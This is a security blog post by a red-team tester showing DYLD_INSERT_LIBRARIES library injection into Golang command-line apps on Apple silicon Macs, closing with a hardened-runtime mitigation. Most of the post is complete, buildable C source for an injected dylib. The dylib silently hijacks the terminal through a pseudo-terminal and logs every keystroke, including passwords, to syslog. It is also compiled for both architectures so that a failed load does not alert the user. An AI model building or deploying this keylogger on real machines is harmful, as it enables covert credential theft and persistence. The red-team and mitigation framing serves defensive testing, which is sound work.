DYLIB Injection in Golang apps on Apple silicon chips

blogs· 8min

July 22, 2022

Creating persistence is one of the biggest challenges during Red Team engagements, and doing it in a stealthy, yet reliable way is even more difficult. One old technique on Unix based systems is library injection through environment variables. In this post, we will look at whether this is still possible after macOS 10.14 (Mojave).

Overview

On Linux systems one can inject shared objects into a process by specifying the LD_PRELOAD environment variable, while on MacOS the equivalent is the DYLD_INSERT_LIBRARIES variable. Both of them allow the user (or the attacker) to specify a .so or .dylib file that will get loaded into a process upon execution. This effectively allows code injection and access to application internals such as process memory and control flow. It can be a powerful technique for developers debugging their applications but also for attackers creating backdoors on a system.

We carry out our Red Team engagements in an environment with a large number of clients running MacOS and custom Golang applications, and wanted to test if DYLIB injection was still feasible after the introduction of System Integrity Protection (SIP) and Hardened Runtime by Apple in macOS 10.14 (Mojave).

In this article we will cover:

  • testing DYLIB injection on Golang apps on an M1 Mac
  • creating an effective payload for terminal keylogging on OSX
  • facing the challenges of multiarch support via Rosetta
  • mitigating DYLIB injection in Golang apps by using hardened runtime

Dylib injection in Golang apps

The good (and also the bad news) is, DYLIB injection in Golang apps just works. Since Golang is compiled into native machine code it is just as vulnerable to DYLIB injection as any other application built in C for example. To test this we can create a small Golang application:

password.go

package main

import (
    "fmt"
)

func main() {
    fmt.Println("Enter password: ")
    text2 := ""
    fmt.Scanln(&text2)
    fmt.Println("Welcome!")
}

Build it with:

% go build password.go

Now let's build a library we can inject. We are going to code this one in C, for the sake of expanding it later into a proper payload:

payload.c

#include <stdio.h>

__attribute__((constructor))
static void customConstructor(int argc, const char **argv)
{
  printf("DYLIB injection successful!\n");
}

Build it with:

% gcc -dynamiclib payload.c -o payload.dylib

Now export the library path:

% export DYLD_INSERT_LIBRARIES=$PATH/payload.dylib

And finally execute the password application:

% ./password
DYLIB injection successful!
Enter password:

From the output we can see the library code executed, along with the original binary, the DYLIB injection was successful.

Creating a terminal keylogger payload

Injecting a library is quite easy as we can see, however creating a useful payload most of the time is not as straightforward. While we could of course execute anything by creating a new thread, in the case of library injection what we are usually after is getting access to the data handled by the process itself.

We could reverse engineer the application and attempt to tamper with the memory but with most console applications (CLIs for example), the sensitive data is in the user input. For this purpose we created a sort of man in the middle payload that utilizes standard system functions to manipulate the terminal and capture input and output.

Challenge 1: peeking stdin

The solution that comes to mind first is to create a new thread that reads all the input from stdin. While this sounds simple enough, after hours of research and trial and error we found out that it is not actually possible. While stdin is in fact a file descriptor it is not seekable, we cannot monitor it with one thread, and continue using it with the other simultaneously. Using getc and trying to push back characters to the stream will result in race conditions, with some characters getting missed.

While it not possible to manipulate the file descriptor the way we want it, nothing is stopping us from creating a new one. Fortunately there is a system call in linux just for this called openpty. This is usually used for running console applications in a virtual terminal, however we can use it to create a virtual terminal and hijack both the input and the output of the process using it. The idea is to give the virtual stdin and stdout to the original process by rewriting the STDIN_FILENO and STDOUT_FILENO descriptors using dup2. With this we are essentially cutting the application off from the actual user input and output, and making it run in a fake terminal.

    int master;
    int slave;
    openpty(&master, &slave, NULL, &current, NULL);
    
    dup2(slave, STDIN_FILENO);
    dup2(slave, STDOUT_FILENO);
    dup2(slave, STDERR_FILENO);

We will also create a set of new file descriptors to the calling terminal, allowing us to communicate with the user:

    oldstdin = fileno(fopen("/dev/tty", "r"));
    oldstdout = fileno(fopen("/dev/tty", "a"));
    oldstderr = oldstdout;

The next step is to create a bridge between the virtual and the real terminal. We will forward all user input from the real stdin to the virtual and do the same for output in the other direction. We will also copy and log everything along the way of course :)

  fd_set rfds;
  struct timeval tv;
  tv.tv_sec = 0;
  tv.tv_usec = 0;
  char buf[4097];
  int size;
  
  FD_ZERO(&rfds);
  FD_SET(oldstdin, &rfds);
  if (select(oldstdin + 1, &rfds, NULL, NULL, &tv)) {
    size = read(oldstdin, buf, 4096);
    buf[size] = '\0';
    syslog(LOG_ERR, "Data:%s\n", buf);
    write(master, buf, size);
  }
        
  FD_ZERO(&rfds);
  FD_SET(master, &rfds);
  if (select(master + 1, &rfds, NULL, NULL, &tv)) {
    size = read(master, buf, 4096);
    buf[size] = '\0';
    write(oldstdout, buf, size);
  }

Here we are also using select to monitor whether the file descriptors are ready.

Challenge 2: raw input and other terminal settings

The solution above will work perfectly, as long as the application doesn't do anything weird with the terminal, for example changing the input mode to raw... The terminal has a set of options that control how user input and output behaves. The termios functions allow developers to set things like switching between buffered or raw input mode (the app receives input line by line or upon every keypress), or turning on and off terminal echo. These calls are usually hidden from developers by libraries such as ncurses, but this also means that a lot of programs use this, even without us knowing it. Trying this MiTM technique on the following example code will break user input entirely:

#include <stdio.h>
#include <termios.h>
#include <stdlib.h>

int main()
{

    char ch;

    struct termios current;
    int result;
    tcgetattr (0, &current);
    cfmakeraw(&current);
    tcsetattr (0, TCSANOW, &current);

    printf("Enter some text: ");
    for(int i = 0; i<20; i = i+1){
        scanf("%c", &ch);
        printf("%c", ch);
    }

    return 0;
}

The solution to this is fortunately quite simple. We have to monitor the virtual terminal for changes in the configuration and then apply them to the real terminal.

The following function copies the terminal attributes from one terminal to the other:

void terminalcopy(int old, int new){
    struct termios oldsettings;
    int result;
    result = tcgetattr (old, &oldsettings);
    if (result < 0)
    {
        syslog(LOG_ERR, "error in tcgetattr old");
    }
    result = tcsetattr (new, TCSANOW, &oldsettings);
    if (result < 0)
    {
        syslog(LOG_ERR, "error in tcsetattr");
    }
}

We can simply embed this into our input loop.

Challenge 3: exfiltrating data

This isn't really a challenge with the injection, it is more a challenge with Red Teaming in general. Getting the stolen goods across the border, aka writing logged passwords or API keys to a file is usually a noisy process. In this payload we are going to use a solution proposed by our team lead @Daniel Teixeira. We are going to write all our data to syslog. We are going to use the syslog command.

syslog(LOG_ERR, "Data:%s\n", buf);

This solution is practical when the engagement allows relatively easy access to log facilities. It could be further refined by encrypting the logged information.

Putting it all together

#include "spy.h"
#include <stdio.h>
#include <syslog.h>
#include <stdlib.h>
#include <pthread.h>
#include <sys/select.h>
#include <fcntl.h>
#include <util.h>
#include <unistd.h>
#include <termios.h>

int master;
int slave;
int oldstdin;
int oldstdout;
int oldstderr;

void terminalcopy(int old, int new){
    struct termios oldsettings;
    int result;
    
    result = tcgetattr (old, &oldsettings);
    if (result < 0)
    {
        syslog(LOG_ERR, "error in tcgetattr old");
    }
    result = tcsetattr (new, TCSANOW, &oldsettings);
    if (result < 0)
    {
        syslog(LOG_ERR, "error in tcsetattr");
    }
}

void* spyfunc(){

    syslog(LOG_ERR, "Spy thread started!\n");
    
    fd_set rfds;
    struct timeval tv;
    tv.tv_sec = 0;
    tv.tv_usec = 0;
    char buf[4097];
    int size;
    
    while(1)
    {
        terminalcopy(slave, oldstdin);

        FD_ZERO(&rfds);
        FD_SET(oldstdin, &rfds);
        if (select(oldstdin + 1, &rfds, NULL, NULL, &tv)) {
            size = read(oldstdin, buf, 4096);
            buf[size] = '\0';
            syslog(LOG_ERR, "Data:%s\n", buf);
            write(master, buf, size);
        }
        
        FD_ZERO(&rfds);
        FD_SET(master, &rfds);
        if (select(master + 1, &rfds, NULL, NULL, &tv)) {
            size = read(master, buf, 4096);
            buf[size] = '\0';
            write(oldstdout, buf, size);
        }
        
    }
    return 0;
}

__attribute__((constructor))
static void customConstructor(int argc, const char **argv)
{
    struct termios current;
    int result;
    result = tcgetattr (STDIN_FILENO, &current);
    
    openpty(&master, &slave, NULL, &current, NULL);
    
    dup2(slave, STDIN_FILENO);
    dup2(slave, STDOUT_FILENO);
    dup2(slave, STDERR_FILENO);
    oldstdin = fileno(fopen("/dev/tty", "r"));
    oldstdout = fileno(fopen("/dev/tty", "a"));
    oldstderr = oldstdout;
    
    pthread_t id;
    
    pthread_create(&id, NULL, spyfunc, NULL);
    
    syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]);
}

This code still has some limitations, it will fail in cases when the application directly manipulates /dev/tty, however for most console applications it works as expected.

Multiarch issues

We are testing this on a realtively new M1 Macbook, which is running both native ARM and x64 binaries. If we simply compile our library it will result in a native ARM binary, however if we try to inject this into an x64 process running under Rosetta we will be facing the following error message:

dyld[31453]: terminating because inserted dylib '/$PATH/spy.dylib' could not be loaded: tried: '/$PATH/spy.dylib' (mach-o file, but is an incompatible architecture (have 'arm64e', need 'x86_64')), '/usr/local/lib/spy.dylib' (no such file), '/usr/lib/spy.dylib' (no such file)

From a Red Team perspective this is an issue, since we can not be sure what kind of process our library will be injected into, and the error can tip off the user that something is not right on the system. To solve this we will have to compile our library with multiarch support.

To achieve this we will Xcode, load our code, select the project, select build settings and set release to ARCHS = $(ARCHS_STANDARD) (Standard Architectures (Apple Silicon, Intel)). Hit build, the resulting dylib file will be under $home/Library/Developer/Xcode/DerivedData/$projectname/Build/Products/Debug/. The result should look like this:

Using this library it is possible to inject into both ARM and x64 processes running under Rosetta.

Protecting against all of this

Apple introduced the Hardened Runtime by Apple in macOS 10.14 (Mojave), which in theory should prevent attacks like this. The catch is that developers have to sign their applications to enable hardened runtime when executing their code.

To test this we can create a self signed certificate in Keychain Access. Then use this certificate to sign our example Go app.

Let's build our go example from before, and test DYLIB injection again:

% export DYLD_INSERT_LIBRARIES=/osx_injections/spy0.dylib
% go build readline.go
% ./readline
DYLIB injection successful!
Enter password:
asdasd
Welcome!

Now let's sign our app with a self signed certificate and hardened runtime enabled:

% sudo codesign -fs certname -o runtime readline
readline: replacing existing signature
% ./readline
Enter password:
asdasd
Welcome!

As we can see the library is no longer loaded, the application, among other things is immune against DYLIB injections.

Conclusion

While Mac OS has some great security features us as developers have to be mindful that sometimes these features have to be explicitly enabled. While DYLIB injection is usually only exploitable when the attackers already have access to the target system, in the name of defense in depth these issues should be mitigated whenever possible.

by Marcell Molnár Ethical Hacker at FORM3

Further resources

blogs · 6 min

PKI certificate management

 I have a rough understanding of PKI certificates, how they work, and what TLS is in general. However, I've always struggled to understand the details, particularly from the point of view of an operator. How do I check if a certificate is valid? How do I check who issued it? What does it even mean to "issue" a certificate? To make matters worse, I'm frequently confounded by the variety of different file types used for certificates. Is it a pem, or a crt, or a pub? Speaking of pub, what's the difference between the TLS certificate my server uses to encrypt traffic, and the certificates I use for SSH authentication? In this post, I will answer these questions and then walk though a practical example of using certificates for TLS via a local nginx proxy, modeling the client/server TLS you often see on the web.

August 5, 2022

blogs · 5 min

.tech Podcast - Supporting diversity in tech

Leah Cohen from School of SOS joins us to share her insights into how tech leaders can support diversity in tech. She tells us about what diversity in tech is and why we should care about it. Then, she explains two key solutions to improving diversity: target the next generation and support transitioning into careers in tech.

July 27, 2022

blogs · 6 min

Linux fundamentals: user space, kernel space, and the syscalls API surface

The Linux kernel has always held a mystical place in my mind. It's the inner sanctum of computer magic which makes programs work. Somehow. People with arcane knowledge of the Linux kernel often refer to "user space" programs, but I've never really been sure what they mean by that. Or of what actually makes up the "kernel", for that matter.

July 6, 2022